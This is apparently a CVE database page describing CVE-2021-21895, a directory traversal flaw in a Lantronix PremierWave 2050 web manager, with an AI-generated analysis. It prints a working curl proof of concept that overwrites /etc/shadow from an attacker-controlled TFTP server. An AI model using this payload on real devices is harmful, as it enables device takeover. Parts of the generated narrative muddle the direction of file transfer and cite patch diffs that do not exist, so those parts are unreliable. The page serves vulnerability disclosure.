CVE-2021-21895
Description
A directory traversal vulnerability exists in the Web Manager FsTFtp functionality of Lantronix PremierWave 2050 8.9.0.0R4 (in QEMU). A specially crafted HTTP request can lead to FsTFtp file overwrite. An attacker can make an authenticated HTTP request to trigger this vulnerability.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
CVE-2021-21895 is a directory traversal flaw in Lantronix PremierWave 2050 Web Manager FsTFtp that allows authenticated attackers to overwrite arbitrary files via HTTP requests.
Vulnerability
A directory traversal vulnerability exists in the Web Manager FsTFtp functionality of Lantronix PremierWave 2050 firmware version 8.9.0.0R4 (tested in QEMU). The feature allows an authenticated user with filesystem privilege to direct a TFTP client on the device to GET or PUT files into or out of a subdirectory rooted at /ltrx_user/. The system sanitizes some but not all attacker-controlled HTTP POST parameters; specifically, the cwd parameter is not properly sanitized before composition of the final file path, enabling path traversal sequences to escape the intended directory [1].
Exploitation
An attacker must be authenticated with a valid user account that has filesystem privilege. The attacker sends a specially crafted HTTP POST request to the Web Manager, manipulating the cwd parameter with path traversal primitives (e.g., ../). This allows the attacker to direct the TFTP client to write arbitrary files outside the /ltrx_user/ directory onto a remote TFTP server under the attacker's control, or to read arbitrary files from the device. The attack requires network access to the device's web interface and a remote TFTP server accessible from the device [1].
Impact
Successful exploitation leads to arbitrary file overwrite (CIA impact: integrity and availability) and arbitrary file disclosure (confidentiality impact). The attacker can overwrite critical system files such as /etc/passwd or /etc/shadow, potentially gaining full control of the device or causing denial of service. The CVSSv3 score is 9.1 (Critical), with a scope change indicating compromise of resources beyond the vulnerable component [1].
Mitigation
As of the publication date (2021-12-22), no fix has been released by Lantronix. The vulnerability is reported on tested firmware version 8.9.0.0R4. Users should monitor vendor advisories for patches. No workaround is disclosed in the available references. The vulnerability is not listed on the CISA KEV catalog as of the publication date [1].
AI Insight generated on May 27, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products
1- Range: =8.9.0.0R4
Patches
0No patches discovered yet.
Vulnerability mechanics
Root cause
"Insufficient sanitization of the attacker-controlled `cwd` HTTP POST parameter allows path traversal sequences to bypass the intended directory restriction rooted at `/ltrx_user/`."
Attack vector
An authenticated attacker with filesystem privilege sends a crafted HTTP POST request to the Web Manager's FsTFtp functionality. The `cwd` parameter is not fully sanitized, so a value such as `../etc` causes the device's TFTP client to compose a file path outside the intended `/ltrx_user/` directory [ref_id=1]. By setting `cmd=get`, the attacker can overwrite arbitrary files (e.g., `/etc/shadow`) with content from an attacker-controlled TFTP server [CWE-22] [ref_id=1]. The attack is network-accessible and requires only valid credentials with the filesystem privilege [ref_id=1].
Affected code
The advisory does not specify exact function names or file paths [ref_id=1]. The vulnerable feature is the FsTFtp functionality within the Web Manager, which handles the `cwd`, `local`, `remote`, `host`, and `port` HTTP POST parameters to direct a TFTP client on the device [ref_id=1].
What the fix does
The advisory does not include a patch diff or remediation code [ref_id=1]. The vendor was disclosed on 2021-06-14 and acknowledged the issue, but no fix is published in the advisory [ref_id=1]. To close the vulnerability, the `cwd` parameter must be validated to reject path traversal sequences (e.g., `../`) and ensure all file operations remain confined to the `/ltrx_user/` directory [CWE-22] [ref_id=1].
Preconditions
- authAttacker must have valid credentials with the filesystem privilege on the PremierWave 2050 Web Manager.
- networkAttacker must have network access to the Web Manager interface and must control a TFTP server reachable from the device.
- inputAttacker must supply a `cwd` parameter containing path traversal sequences (e.g., `../etc`) in the HTTP POST request.
Reproduction
The advisory provides a proof-of-concept curl command [ref_id=1]:
``` curl --user admin:PASS -d "ajax=FsTFtp&cmd=get&local=shadow&remote=shadow&host=192.168.0.254&port=69&submit=Transfer&cwd=../etc" http://192.168.0.1/ ```
This overwrites `/etc/shadow` on the device with a file served from an attacker-controlled TFTP server at 192.168.0.254 [ref_id=1].
Generated on May 25, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References
1- talosintelligence.com/vulnerability_reports/TALOS-2021-1337mitrex_refsource_MISC
News mentions
0No linked articles in our index yet.